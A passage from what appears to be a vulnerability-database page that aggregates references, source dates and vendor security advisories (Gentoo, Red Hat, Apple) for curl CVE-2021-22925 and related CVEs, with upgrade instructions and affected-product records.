"url": "https://access.redhat.com/security/cve/cve-2023-24329"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-40528"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhba-2023:4052"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-29824"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-4450"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3580"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-428208"
},
{
"db": "VULMON",
"id": "CVE-2022-37434"
},
{
"db": "PACKETSTORM",
"id": "169335"
},
{
"db": "PACKETSTORM",
"id": "169595"
},
{
"db": "PACKETSTORM",
"id": "170210"
},
{
"db": "PACKETSTORM",
"id": "169810"
},
{
"db": "PACKETSTORM",
"id": "170242"
},
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "169624"
},
{
"db": "PACKETSTORM",
"id": "170162"
},
{
"db": "PACKETSTORM",
"id": "178074"
},
{
"db": "PACKETSTORM",
"id": "173605"
},
{
"db": "NVD",
"id": "CVE-2022-37434"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-428208",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2022-37434",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169335",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169595",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170210",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169810",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170242",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169692",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169696",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169624",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170162",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "178074",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "173605",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-37434",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-428208",
"ident": null
},
{
"date": "2022-08-05T00:00:00",
"db": "VULMON",
"id": "CVE-2022-37434",
"ident": null
},
{
"date": "2022-08-28T19:12:00",
"db": "PACKETSTORM",
"id": "169335",
"ident": null
},
{
"date": "2022-10-31T14:53:38",
"db": "PACKETSTORM",
"id": "169595",
"ident": null
},
{
"date": "2022-12-13T17:16:20",
"db": "PACKETSTORM",
"id": "170210",
"ident": null
},
{
"date": "2022-11-10T13:48:32",
"db": "PACKETSTORM",
"id": "169810",
"ident": null
},
{
"date": "2022-12-15T15:34:35",
"db": "PACKETSTORM",
"id": "170242",
"ident": null
},
{
"date": "2022-11-02T15:00:46",
"db": "PACKETSTORM",
"id": "169692",
"ident": null
},
{
"date": "2022-11-02T15:01:31",
"db": "PACKETSTORM",
"id": "169696",
"ident": null
},
{
"date": "2022-11-01T13:31:28",
"db": "PACKETSTORM",
"id": "169624",
"ident": null
},
{
"date": "2022-12-08T16:34:22",
"db": "PACKETSTORM",
"id": "170162",
"ident": null
},
{
"date": "2024-04-16T14:05:51",
"db": "PACKETSTORM",
"id": "178074",
"ident": null
},
{
"date": "2023-07-19T15:37:11",
"db": "PACKETSTORM",
"id": "173605",
"ident": null
},
{
"date": "2022-08-05T07:15:07.240000",
"db": "NVD",
"id": "CVE-2022-37434",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-01-09T00:00:00",
"db": "VULHUB",
"id": "VHN-428208",
"ident": null
},
{
"date": "2022-08-08T00:00:00",
"db": "VULMON",
"id": "CVE-2022-37434",
"ident": null
},
{
"date": "2025-05-30T20:15:30.030000",
"db": "NVD",
"id": "CVE-2022-37434",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "169692"
},
{
"db": "PACKETSTORM",
"id": "169624"
}
],
"trust": 0.2
},
"title": {
"_id": null,
"data": "Debian Security Advisory 5218-1",
"sources": [
{
"db": "PACKETSTORM",
"id": "169335"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "code execution",
"sources": [
{
"db": "PACKETSTORM",
"id": "169696"
},
{
"db": "PACKETSTORM",
"id": "173605"
}
],
"trust": 0.2
}
}
VAR-202108-2221
Vulnerability from variot - Updated: 2026-03-09 20:13curl supports the -t command line option, known as CURLOPT_TELNETOPTIONSin libcurl. This rarely used option is used to send variable=content pairs toTELNET servers.Due to flaw in the option parser for sending NEW_ENV variables, libcurlcould be made to pass on uninitialized data from a stack based buffer to theserver. Therefore potentially revealing sensitive internal information to theserver using a clear-text network protocol.This could happen because curl did not call and use sscanf() correctly whenparsing the string provided by the application. cURL Exists in the use of uninitialized resources.Information may be obtained. Summary:
An update is now available for OpenShift Logging 5.1. Solution:
For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:
https://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html
For Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:
https://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html
- Bugs fixed (https://bugzilla.redhat.com/):
1944888 - CVE-2021-21409 netty: Request smuggling via content-length header 2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data 2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way 2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
-
Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922 [ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923 [ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925 [ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926 [ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945 [ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946 [ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947 [ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576 [ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774 [ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775 [ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776 [ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779 [ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780 [ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781 [ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782 [ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115 [ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205 [ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206 [ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207 [ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208 [ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221 [ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252 [ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260 [ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915 [ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2022 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5 . Description:
Gatekeeper Operator v0.2
Gatekeeper is an open source project that applies the OPA Constraint Framework to enforce policies on your Kubernetes clusters.
This advisory contains the container images for Gatekeeper that include security updates, and container upgrades. For support options for any other use, see the Gatekeeper open source project website at: https://open-policy-agent.github.io/gatekeeper/website/docs/howto/.
Security updates:
-
golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)
-
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
The requirements to apply the upgraded images are different whether or not you used the operator. Complete the following steps, depending on your installation:
-
- Upgrade gatekeeper operator:
The gatekeeper operator that is installed by the gatekeeper operator policy
has
installPlanApprovalset toAutomatic. This setting means the operator will be upgraded automatically when there is a new version of the operator. No further action is required for upgrade. If you changed the setting forinstallPlanApprovaltomanual, then you must view each cluster to manually approve the upgrade to the operator.
- Upgrade gatekeeper operator:
The gatekeeper operator that is installed by the gatekeeper operator policy
has
-
- Upgrade gatekeeper without the operator: The gatekeeper version is specified as part of the Gatekeeper CR in the gatekeeper operator policy. To upgrade the gatekeeper version: a) Determine the latest version of gatekeeper by visiting: https://catalog.redhat.com/software/containers/rhacm2/gatekeeper-rhel8/5fadb4a18d9a79d2f438a5d9. b) Click the tag dropdown, and find the latest static tag. An example tag is 'v3.3.0-1'. c) Edit the gatekeeper operator policy and update the image tag to use the latest static tag. For example, you might change this line to image: 'registry.redhat.io/rhacm2/gatekeeper-rhel8:v3.3.0-1'. Bugs fixed (https://bugzilla.redhat.com/):
2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2021-09-20-7 Additional information for APPLE-SA-2021-09-13-3 macOS Big Sur 11.6
macOS Big Sur 11.6 addresses the following issues.
CoreGraphics Available for: macOS Big Sur Impact: Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: An integer overflow was addressed with improved input validation. CVE-2021-30860: The Citizen Lab
CUPS Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A permissions issue existed. This issue was addressed with improved permission validation. CVE-2021-30827: an anonymous researcher Entry added September 20, 2021
CUPS Available for: macOS Big Sur Impact: A local user may be able to read arbitrary files as root Description: This issue was addressed with improved checks. CVE-2021-30828: an anonymous researcher Entry added September 20, 2021
CUPS Available for: macOS Big Sur Impact: A local user may be able to execute arbitrary files Description: A URI parsing issue was addressed with improved parsing. CVE-2021-22925 Entry added September 20, 2021
CVMS Available for: macOS Big Sur Impact: A local attacker may be able to elevate their privileges Description: A memory corruption issue was addressed with improved state management. CVE-2021-30832: Mickey Jin (@patch1t) of Trend Micro Entry added September 20, 2021
FontParser Available for: macOS Big Sur Impact: Processing a maliciously crafted dfont file may lead to arbitrary code execution Description: This issue was addressed with improved checks. CVE-2021-30841: Xingwei Lin of Ant Security Light-Year Lab CVE-2021-30842: Xingwei Lin of Ant Security Light-Year Lab CVE-2021-30843: Xingwei Lin of Ant Security Light-Year Lab Entry added September 20, 2021
Gatekeeper Available for: macOS Big Sur Impact: A malicious application may bypass Gatekeeper checks Description: This issue was addressed with improved checks. CVE-2021-30853: Gordon Long (@ethicalhax) of Box, Inc. Entry added September 20, 2021
ImageIO Available for: macOS Big Sur Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: This issue was addressed with improved checks. CVE-2021-30847: Mike Zhang of Pangu Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2021-30830: Zweig of Kunlun Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds read was addressed with improved input validation. CVE-2021-30865: Zweig of Kunlun Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved locking. CVE-2021-30857: Zweig of Kunlun Lab Entry added September 20, 2021
Kernel Available for: macOS Big Sur Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A type confusion issue was addressed with improved state handling. CVE-2021-30859: Apple Entry added September 20, 2021
libexpat Available for: macOS Big Sur Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed by updating expat to version 2.4.1. CVE-2013-0340: an anonymous researcher Entry added September 20, 2021
Preferences Available for: macOS Big Sur Impact: An application may be able to access restricted files Description: A validation issue existed in the handling of symlinks. This issue was addressed with improved validation of symlinks. CVE-2021-30855: Zhipeng Huo (@R3dF09) and Yuebin Sun (@yuebinsun2020) of Tencent Security Xuanwu Lab (xlab.tencent.com) Entry added September 20, 2021
Sandbox Available for: macOS Big Sur Impact: A user may gain access to protected parts of the file system Description: An access issue was addressed with improved access restrictions. CVE-2021-30850: an anonymous researcher Entry added September 20, 2021
SMB Available for: macOS Big Sur Impact: A local user may be able to read kernel memory Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2021-30845: Peter Nguyen Vu Hoang of STAR Labs Entry added September 20, 2021
SMB Available for: macOS Big Sur Impact: A remote attacker may be able to leak memory Description: A logic issue was addressed with improved state management. CVE-2021-30844: Peter Nguyen Vu Hoang of STAR Labs Entry added September 20, 2021
WebKit Available for: macOS Big Sur Impact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. Description: A use after free issue was addressed with improved memory management. CVE-2021-30858: an anonymous researcher
Additional recognition
APFS We would like to acknowledge Koh M. Nakagawa of FFRI Security, Inc. for their assistance. Entry added September 20, 2021
App Support We would like to acknowledge @CodeColorist, an anonymous researcher for their assistance. Entry added September 20, 2021
CoreML We would like to acknowledge hjy79425575 working with Trend Micro Zero Day Initiative for their assistance. Entry added September 20, 2021
CUPS We would like to acknowledge an anonymous researcher for their assistance. Entry added September 20, 2021
Kernel We would like to acknowledge Anthony Steinhauser of Google's Safeside project for their assistance. Entry added September 20, 2021
Sandbox We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance. Entry added September 20, 2021
smbx We would like to acknowledge Zhongcheng Li (CK01) for their assistance. Entry added September 20, 2021
Installation note:
This update may be obtained from the Mac App Store or Apple's Software Downloads web site: https://support.apple.com/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEePiLW1MrMjw19XzoeC9qKD1prhgFAmFI888ACgkQeC9qKD1p rhi/Bg/9GiqXl8sxPjDpATJqneZ1GcAxWxBZgkFrcLV/cMwrVqniWsOeVHqHjMSY eJUkGehUtKsYE0g8Uk0qJqOUl3dxxGJpIDytOQJB3TFdd1BpZSK/tOChVem1JV1B +CMhqDnmR/u7bLqfCr1p6J5QJNHjTjgBA4RthdzZZ52pLGql7/2qfaJwpeHkheS4 5EKmch8zh0CGRqrUTg1HgY67ierNsz47jIU6n7UeMwjskRU3xM9VqJ9s4eKGAtSv 4Ry16pv0xUZ4cmL5EiLm2/eFbY8ByCji7jYPP0POBO4l518TGpaX2PaZBP9v0rrD t6cPEZHnsRaZ49OYak6z9iA8teKGSs6aCMuzSxExvlT8+YySf1o1nefbRH/tZMfn bwSO0ZyPsS9WYyuG/zX08U3CKOTkjqhLaOwVwte+cAeg2QS85aa9XPMG6PKcpyfu R7auxS92+Dg+R+97dAsI9TprSutCTw4iY8lyK9MVJSnh+zQSZEihUh4EaSufTHRC NlOSHvsTfXqsHaeed6sVKyX4ADHCUvRbCCIrqJKUs6waNd2T2XF7SzvgTSDJMHU9 4AL/jpnltTjDJTtMO999VZKNzYurrGiHvBs5zHWr91+eaHW8YGdsDERsX3BFYLe3 85i+Yge0iXlP7mT32cWxIw4AWDFITFiHnmV1/cdsCd2GIkqkhFw= =9bjT -----END PGP SIGNATURE-----
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ACS 3.67 security and enhancement update Advisory ID: RHSA-2021:4902-01 Product: RHACS Advisory URL: https://access.redhat.com/errata/RHSA-2021:4902 Issue date: 2021-12-01 CVE Names: CVE-2018-20673 CVE-2019-5827 CVE-2019-13750 CVE-2019-13751 CVE-2019-17594 CVE-2019-17595 CVE-2019-18218 CVE-2019-19603 CVE-2019-20838 CVE-2020-12762 CVE-2020-13435 CVE-2020-14155 CVE-2020-16135 CVE-2020-24370 CVE-2020-27304 CVE-2021-3200 CVE-2021-3445 CVE-2021-3580 CVE-2021-3749 CVE-2021-3800 CVE-2021-3801 CVE-2021-20231 CVE-2021-20232 CVE-2021-20266 CVE-2021-22876 CVE-2021-22898 CVE-2021-22925 CVE-2021-23343 CVE-2021-23840 CVE-2021-23841 CVE-2021-27645 CVE-2021-28153 CVE-2021-29923 CVE-2021-32690 CVE-2021-33560 CVE-2021-33574 CVE-2021-35942 CVE-2021-36084 CVE-2021-36085 CVE-2021-36086 CVE-2021-36087 CVE-2021-39293 =====================================================================
- Summary:
Updated images are now available for Red Hat Advanced Cluster Security for Kubernetes (RHACS).
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
The release of RHACS 3.67 provides the following new features, bug fixes, security patches and system changes:
OpenShift Dedicated support
RHACS 3.67 is thoroughly tested and supported on OpenShift Dedicated on Amazon Web Services and Google Cloud Platform.
-
Use OpenShift OAuth server as an identity provider If you are using RHACS with OpenShift, you can now configure the built-in OpenShift OAuth server as an identity provider for RHACS.
-
Enhancements for CI outputs Red Hat has improved the usability of RHACS CI integrations. CI outputs now show additional detailed information about the vulnerabilities and the security policies responsible for broken builds.
-
Runtime Class policy criteria Users can now use RHACS to define the container runtime configuration that may be used to run a pod’s containers using the Runtime Class policy criteria.
Security Fix(es):
-
civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API (CVE-2020-27304)
-
nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
-
nodejs-prismjs: ReDoS vulnerability (CVE-2021-3801)
-
golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet (CVE-2021-29923)
-
helm: information disclosure vulnerability (CVE-2021-32690)
-
golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) (CVE-2021-39293)
-
nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe (CVE-2021-23343)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fixes The release of RHACS 3.67 includes the following bug fixes:
-
Previously, when using RHACS with the Compliance Operator integration, RHACS did not respect or populate Compliance Operator TailoredProfiles. This has been fixed.
-
Previously, the Alpine Linux package manager (APK) in Image policy looked for the presence of apk package in the image rather than the apk-tools package. This issue has been fixed.
System changes The release of RHACS 3.67 includes the following system changes:
- Scanner now identifies vulnerabilities in Ubuntu 21.10 images.
- The Port exposure method policy criteria now include route as an exposure method.
- The OpenShift: Kubeadmin Secret Accessed security policy now allows the OpenShift Compliance Operator to check for the existence of the Kubeadmin secret without creating a violation.
- The OpenShift Compliance Operator integration now supports using TailoredProfiles.
- The RHACS Jenkins plugin now provides additional security information.
- When you enable the environment variable ROX_NETWORK_ACCESS_LOG for Central, the logs contain the Request URI and X-Forwarded-For header values.
- The default uid:gid pair for the Scanner image is now 65534:65534.
- RHACS adds a new default Scope Manager role that includes minimum permissions to create and modify access scopes.
- If microdnf is part of an image or shows up in process execution, RHACS reports it as a security violation for the Red Hat Package Manager in Image or the Red Hat Package Manager Execution security policies.
- In addition to manually uploading vulnerability definitions in offline mode, you can now upload definitions in online mode.
- You can now format the output of the following roxctl CLI commands in table, csv, or JSON format: image scan, image check & deployment check
-
You can now use a regular expression for the deployment name while specifying policy exclusions
-
Solution:
To take advantage of these new features, fixes and changes, please upgrade Red Hat Advanced Cluster Security for Kubernetes to version 3.67.
- Bugs fixed (https://bugzilla.redhat.com/):
1956818 - CVE-2021-23343 nodejs-path-parse: ReDoS via splitDeviceRe, splitTailRe and splitPathRe 1978144 - CVE-2021-32690 helm: information disclosure vulnerability 1992006 - CVE-2021-29923 golang: net: incorrect parsing of extraneous zero characters at the beginning of an IP address octet 1999784 - CVE-2021-3749 nodejs-axios: Regular expression denial of service in trim function 2005445 - CVE-2021-3801 nodejs-prismjs: ReDoS vulnerability 2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) 2016640 - CVE-2020-27304 civetweb: directory traversal when using the built-in example HTTP form-based file upload mechanism via the mg_handle_form_request API
- JIRA issues fixed (https://issues.jboss.org/):
RHACS-65 - Release RHACS 3.67.0
- References:
https://access.redhat.com/security/cve/CVE-2018-20673 https://access.redhat.com/security/cve/CVE-2019-5827 https://access.redhat.com/security/cve/CVE-2019-13750 https://access.redhat.com/security/cve/CVE-2019-13751 https://access.redhat.com/security/cve/CVE-2019-17594 https://access.redhat.com/security/cve/CVE-2019-17595 https://access.redhat.com/security/cve/CVE-2019-18218 https://access.redhat.com/security/cve/CVE-2019-19603 https://access.redhat.com/security/cve/CVE-2019-20838 https://access.redhat.com/security/cve/CVE-2020-12762 https://access.redhat.com/security/cve/CVE-2020-13435 https://access.redhat.com/security/cve/CVE-2020-14155 https://access.redhat.com/security/cve/CVE-2020-16135 https://access.redhat.com/security/cve/CVE-2020-24370 https://access.redhat.com/security/cve/CVE-2020-27304 https://access.redhat.com/security/cve/CVE-2021-3200 https://access.redhat.com/security/cve/CVE-2021-3445 https://access.redhat.com/security/cve/CVE-2021-3580 https://access.redhat.com/security/cve/CVE-2021-3749 https://access.redhat.com/security/cve/CVE-2021-3800 https://access.redhat.com/security/cve/CVE-2021-3801 https://access.redhat.com/security/cve/CVE-2021-20231 https://access.redhat.com/security/cve/CVE-2021-20232 https://access.redhat.com/security/cve/CVE-2021-20266 https://access.redhat.com/security/cve/CVE-2021-22876 https://access.redhat.com/security/cve/CVE-2021-22898 https://access.redhat.com/security/cve/CVE-2021-22925 https://access.redhat.com/security/cve/CVE-2021-23343 https://access.redhat.com/security/cve/CVE-2021-23840 https://access.redhat.com/security/cve/CVE-2021-23841 https://access.redhat.com/security/cve/CVE-2021-27645 https://access.redhat.com/security/cve/CVE-2021-28153 https://access.redhat.com/security/cve/CVE-2021-29923 https://access.redhat.com/security/cve/CVE-2021-32690 https://access.redhat.com/security/cve/CVE-2021-33560 https://access.redhat.com/security/cve/CVE-2021-33574 https://access.redhat.com/security/cve/CVE-2021-35942 https://access.redhat.com/security/cve/CVE-2021-36084 https://access.redhat.com/security/cve/CVE-2021-36085 https://access.redhat.com/security/cve/CVE-2021-36086 https://access.redhat.com/security/cve/CVE-2021-36087 https://access.redhat.com/security/cve/CVE-2021-39293 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYafeGdzjgjWX9erEAQgZ8Q/9H5ov4ZfKZszdJu0WvRMetEt6DMU2RTZr Kjv4h4FnmsMDYYDocnkFvsRjcpdGxtoUShAqD6+FrTNXjPtA/v1tsQTJzhg4o50w tKa9T4aHfrYXjGvWgQXJJEGmGaYMYePUOv77x6pLfMB+FmgfOtb8kzOdNzAtqX3e lq8b2DrQuPSRiWkUgFM2hmS7OtUsqTIShqWu67HJdOY74qDN4DGp7GnG6inCrUjV x4/4X5Fb7JrAYiy57C5eZwYW61HmrG7YHk9SZTRYgRW0rfgLncVsny4lX1871Ch2 e8ttu0EJFM1EJyuCJwJd1Q+rhua6S1VSY+etLUuaYme5DtvozLXQTLUK31qAq/hK qnLYQjaSieea9j1dV6YNHjnvV0XGczyZYwzmys/CNVUxwvSHr1AJGmQ3zDeOt7Qz vguWmPzyiob3RtHjfUlUpPYeI6HVug801YK6FAoB9F2BW2uHVgbtKOwG5pl5urJt G4taizPtH8uJj5hem5nHnSE1sVGTiStb4+oj2LQonRkgLQ2h7tsX8Z8yWM/3TwUT PTBX9AIHwt8aCx7XxTeEIs0H9B1T9jYfy06o9H2547un9sBoT0Sm7fqKuJKic8N/ pJ2kXBiVJ9B4G+JjWe8rh1oC1yz5Q5/5HZ19VYBjHhYEhX4s9s2YsF1L1uMoT3NN T0pPNmsPGZY= =ux5P -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary:
The Migration Toolkit for Containers (MTC) 1.5.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Security Fix(es):
-
nodejs-immer: prototype pollution may lead to DoS or remote code execution (CVE-2021-3757)
-
mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC) (CVE-2021-3948)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For details on how to install and use MTC, refer to:
https://docs.openshift.com/container-platform/latest/migration_toolkit_for_containers/installing-mtc.html
- Bugs fixed (https://bugzilla.redhat.com/):
2000734 - CVE-2021-3757 nodejs-immer: prototype pollution may lead to DoS or remote code execution 2005438 - Combining Rsync and Stunnel in a single pod can degrade performance (1.5 backport) 2006842 - MigCluster CR remains in "unready" state and source registry is inaccessible after temporary shutdown of source cluster 2007429 - "oc describe" and "oc log" commands on "Migration resources" tree cannot be copied after failed migration 2022017 - CVE-2021-3948 mig-controller: incorrect namespaces handling may lead to not authorized usage of Migration Toolkit for Containers (MTC)
- Solution:
See the Red Hat OpenShift Container Platform 4.6 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.6/html/serverless/index See the Red Hat OpenShift Container Platform 4.7 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.7/html/serverless/index See the Red Hat OpenShift Container Platform 4.8 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.8/html/serverless/index See the Red Hat OpenShift Container Platform 4.9 documentation at: https://access.redhat.com/documentation/en-us/openshift_container_platform/4.9/html/serverless/index
4
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.0.1"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "eq",
"trust": 1.0,
"vendor": "splunk",
"version": "9.1.0"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.3"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.3.1"
},
{
"_id": null,
"model": "sinema remote connect server",
"scope": "lt",
"trust": 1.0,
"vendor": "siemens",
"version": "3.1"
},
{
"_id": null,
"model": "macos",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "11.4"
},
{
"_id": null,
"model": "universal forwarder",
"scope": "lt",
"trust": 1.0,
"vendor": "splunk",
"version": "9.0.6"
},
{
"_id": null,
"model": "sinec infrastructure network services",
"scope": "lt",
"trust": 1.0,
